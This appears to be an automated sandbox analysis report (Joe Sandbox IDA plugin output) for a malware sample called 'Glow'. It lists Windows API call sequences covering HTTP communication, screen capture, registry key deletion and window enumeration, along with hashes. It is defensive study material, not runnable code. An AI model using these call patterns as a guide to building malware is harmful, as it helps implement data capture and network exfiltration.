                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                          • String ID: <)E
                                                                                                                                                                          • API String ID: 641708696-2428563218
                                                                                                                                                                          • Opcode ID: 8bacf09bce0cab165a6a15c61a198cc392278a3137c120e275cb9a525fbff107
                                                                                                                                                                          • Instruction ID: 75171315ad966145af578609f63bf965e8103b0bf7bdd3f2e475f71022e9fb5e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8bacf09bce0cab165a6a15c61a198cc392278a3137c120e275cb9a525fbff107
                                                                                                                                                                          • Instruction Fuzzy Hash: 1B617D71601701DFDB36AF15DA48B2677B9FB82312F11806DE04687A61C770ED92CB88
                                                                                                                                                                          APIs
                                                                                                                                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003FCEF5
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003FCF08
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003FCF1C
                                                                                                                                                                          • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003FCF35
                                                                                                                                                                          • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003FCF78
                                                                                                                                                                          • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003FCF8E
                                                                                                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003FCF99
                                                                                                                                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003FCFC9
                                                                                                                                                                          • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003FD021
                                                                                                                                                                          • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003FD035
                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 003FD040
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3800310941-3916222277
                                                                                                                                                                          • Opcode ID: 596b95403b435665a3f305d4eb56efbdde5eaff165ecd6d76445bd2ce859d6dd
                                                                                                                                                                          • Instruction ID: 270500533c16e6fccbeb2f9c78492a68bfc4ee016e3a774d44282575427f1518
                                                                                                                                                                          • Opcode Fuzzy Hash: 596b95403b435665a3f305d4eb56efbdde5eaff165ecd6d76445bd2ce859d6dd
                                                                                                                                                                          • Instruction Fuzzy Hash: A5516BB550070DBFDB229F60C988ABBBBBDFF09744F00842AFA5596250DB34D945AB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,004166D6,?,?), ref: 00418FEE
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00418FFE
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419009
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419016
                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 00419024
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419033
                                                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041903C
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419043
                                                                                                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004166D6,?,?,00000000,?), ref: 00419054
                                                                                                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00420C04,?), ref: 0041906D
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 0041907D
                                                                                                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0041909D
                                                                                                                                                                          • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 004190CD
                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 004190F5
                                                                                                                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0041910B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3840717409-0
                                                                                                                                                                          • Opcode ID: 5ff7d2bba5ba91fcf42363e0e767a06afa34dc5c6e474bff269af49b3e21d7f8
                                                                                                                                                                          • Instruction ID: 2d52c270b3f182888adfec79b96331377f36089a53848f1299ce38da3b50ad29
                                                                                                                                                                          • Opcode Fuzzy Hash: 5ff7d2bba5ba91fcf42363e0e767a06afa34dc5c6e474bff269af49b3e21d7f8
                                                                                                                                                                          • Instruction Fuzzy Hash: 494136B1A00208BFDB119F65DC88EABBBB8FB89710F108069F916D7260D7749D41CB24
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038B329: _wcslen.LIBCMT ref: 0038B333
                                                                                                                                                                            • Part of subcall function 0040D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0040C10E,?,?), ref: 0040D415
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D451
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4C8
                                                                                                                                                                            • Part of subcall function 0040D3F8: _wcslen.LIBCMT ref: 0040D4FE
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040C154
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0040C1D2
                                                                                                                                                                          • RegDeleteValueW.ADVAPI32(?,?), ref: 0040C26A
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040C2DE
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040C2FC
                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0040C352
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0040C364
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0040C382
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0040C3E3
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040C3F4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                          • API String ID: 146587525-4033151799
                                                                                                                                                                          • Opcode ID: fbcd9be3ce5065140294de4651128236c64dc2a2f26c914f8f29bc0f2dfa5069
                                                                                                                                                                          • Instruction ID: d3905f687411d1b6a880f398f5aca3f5879073713627822b2d3298ec4053a7ff
                                                                                                                                                                          • Opcode Fuzzy Hash: fbcd9be3ce5065140294de4651128236c64dc2a2f26c914f8f29bc0f2dfa5069
                                                                                                                                                                          • Instruction Fuzzy Hash: 27C16B70604301EFD711EF54C484F6ABBE1AF84308F1485ADE85A9B3A2CB79E946CB95
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0041A990
                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 0041A9A7
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0041A9B3
                                                                                                                                                                          • GetSystemMetrics.USER32(0000000F), ref: 0041A9C9
                                                                                                                                                                          • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0041AC15
                                                                                                                                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0041AC33
                                                                                                                                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0041AC54
                                                                                                                                                                          • ShowWindow.USER32(00000003,00000000), ref: 0041AC73
                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0041AC95
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000005,?), ref: 0041ACBB
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                          • String ID: @$(E
                                                                                                                                                                          • API String ID: 3962739598-1017287955
                                                                                                                                                                          • Opcode ID: 87e9220f1c5088b5d61eeb45ce5ef700746d72326a64788bf80ead7202affa41
                                                                                                                                                                          • Instruction ID: 1c2f4fa4327de5b34aa4f6e57668181c7e40d84c192e12427a36777876e2b534
                                                                                                                                                                          • Opcode Fuzzy Hash: 87e9220f1c5088b5d61eeb45ce5ef700746d72326a64788bf80ead7202affa41
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BB19D70601219DFCF14CF68C9847EE7BF2BF44700F18806AED499B295E778A990CB99
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0038249F: GetWindowLongW.USER32(00000000,000000EB), ref: 003824B0
                                                                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004197B6
                                                                                                                                                                          • GetFocus.USER32 ref: 004197C6
                                                                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 004197D1
                                                                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00419879
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0041992B
                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 00419948
                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00419958
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0041998A
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004199CC
                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004199FD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                          • String ID: 0$(E
                                                                                                                                                                          • API String ID: 1026556194-3502916920
                                                                                                                                                                          • Opcode ID: 5215312e9124f4f806bd68fd12a781b1bf585cbaad879599c5a0a46ad2413814
                                                                                                                                                                          • Instruction ID: e16696a8b9bb35caa6a6c96eef992fd8158b05b8f0057ed493de31a3a5ac8d2f
                                                                                                                                                                          • Opcode Fuzzy Hash: 5215312e9124f4f806bd68fd12a781b1bf585cbaad879599c5a0a46ad2413814
                                                                                                                                                                          • Instruction Fuzzy Hash: 7081CCB0A14301ABD710DF25C894AEB7BE8BB89314F00492EF98597291C774DD85CBAA
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00403035
                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00403045
                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00403051
                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 0040305E
                                                                                                                                                                          • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004030CA
                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00403109
                                                                                                                                                                          • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0040312D
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00403135
                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040313E
                                                                                                                                                                          • DeleteDC.GDI32(?), ref: 00403145
                                                                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00403150
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                          • String ID: (
                                                                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                                                                          • Opcode ID: ac34b67213c8590b167a2a0c479143666a38d1951b47f757ceb5e59cf51afa1e
                                                                                                                                                                          • Instruction ID: bde7a05050b999bf190240eace1450e3b095192473a6175a8690733c29bc60f4
                                                                                                                                                                          • Opcode Fuzzy Hash: ac34b67213c8590b167a2a0c479143666a38d1951b47f757ceb5e59cf51afa1e
                                                                                                                                                                          • Instruction Fuzzy Hash: 3061D2B5D00219AFCF05CFA4D884EAEBBBAFF48310F20852AE555A7250D775AA41CF94
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 003E52E6
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 003E5328
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003E5339
                                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 003E5345
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 003E537A
                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 003E53B2
                                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 003E53EB
                                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 003E5445
                                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 003E5477
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 003E54EF
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                          • String ID: ThumbnailClass
                                                                                                                                                                          • API String ID: 1311036022-1241985126
                                                                                                                                                                          • Opcode ID: 29c22cff4a04d3c7be5c362f0275f33b7983e1422d7e63095b73996bb8103ea6
                                                                                                                                                                          • Instruction ID: 06f0b158495b67d1f1114a52e75f2b8ec7ada0518cbe79796ff01f2170e661e4
                                                                                                                                                                          • Opcode Fuzzy Hash: 29c22cff4a04d3c7be5c362f0275f33b7983e1422d7e63095b73996bb8103ea6
                                                                                                                                                                          • Instruction Fuzzy Hash: 66912971104B57AFD70ADF26C894BAAB7A9FF01308F004729FA86861D1EB31ED55CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetMenuItemInfoW.USER32(004529C0,000000FF,00000000,00000030), ref: 003EC973
                                                                                                                                                                          • SetMenuItemInfoW.USER32(004529C0,00000004,00000000,00000030), ref: 003EC9A8
                                                                                                                                                                          • Sleep.KERNEL32(000001F4), ref: 003EC9BA
                                                                                                                                                                          • GetMenuItemCount.USER32(?), ref: 003ECA00
                                                                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 003ECA1D
                                                                                                                                                                          • GetMenuItemID.USER32(?,-00000001), ref: 003ECA49
                                                                                                                                                                          • GetMenuItemID.USER32(?,?), ref: 003ECA90
                                                                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003ECAD6
                                                                                                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003ECAEB
                                                                                                                                                                          • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003ECB0C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                          • String ID: 0
                                                                                                                                                                          • API String ID: 1460738036-4108050209
                                                                                                                                                                          • Opcode ID: 55a5a4080650a8452758331edf55bf372fa597674e32f33690461dbe3b4a4a18
                                                                                                                                                                          • Instruction ID: c9f7c174e36dcd585b32572aba0d13c0cb6b5b55a64ec4be77ba23df966d49d6
                                                                                                                                                                          • Opcode Fuzzy Hash: 55a5a4080650a8452758331edf55bf372fa597674e32f33690461dbe3b4a4a18
                                                                                                                                                                          • Instruction Fuzzy Hash: 4261A4B09102AAAFDF12CF65CD49AEE7BB9FB05344F045265F812A72D1D734AD02CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003EE4D4
                                                                                                                                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003EE4FA
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003EE504
                                                                                                                                                                          • _wcsstr.LIBVCRUNTIME ref: 003EE554
                                                                                                                                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003EE570
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                          • API String ID: 1939486746-1459072770
                                                                                                                                                                          • Opcode ID: 8d37d1427ff3efa283b44d9522f653869b25964c9dee691b313ac08daa522ab5
                                                                                                                                                                          • Instruction ID: 607417d37368454f44487e96eeffc8ff17099622f3adc548c9be8707e44bd8fa
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d37d1427ff3efa283b44d9522f653869b25964c9dee691b313ac08daa522ab5
                                                                                                                                                                          • Instruction Fuzzy Hash: F7411572A002247AEB16BB658C47FFF776CDF52710F100526F901AA0C2FB799A0196A9
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0040D6C4
                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0040D6ED
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0040D7A8
                                                                                                                                                                            • Part of subcall function 0040D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0040D70A
                                                                                                                                                                            • Part of subcall function 0040D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0040D71D
                                                                                                                                                                            • Part of subcall function 0040D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0040D72F
                                                                                                                                                                            • Part of subcall function 0040D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0040D765
                                                                                                                                                                            • Part of subcall function 0040D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0040D788
                                                                                                                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0040D753
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                          • API String ID: 2734957052-4033151799
                                                                                                                                                                          • Opcode ID: 93b2b0c0eb46fcd86f2cd110f269de041cce6a322160add64f05e4e1fef4112a
                                                                                                                                                                          • Instruction ID: 13d88c41533cdd07289c365a404ff7712fce9173bbc16c45cda4ccad758121bd
                                                                                                                                                                          • Opcode Fuzzy Hash: 93b2b0c0eb46fcd86f2cd110f269de041cce6a322160add64f05e4e1fef4112a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E3180B5E01128BBD7219B90DC88EFFBB7CEF45754F004176B805E3244DB389E499AA8
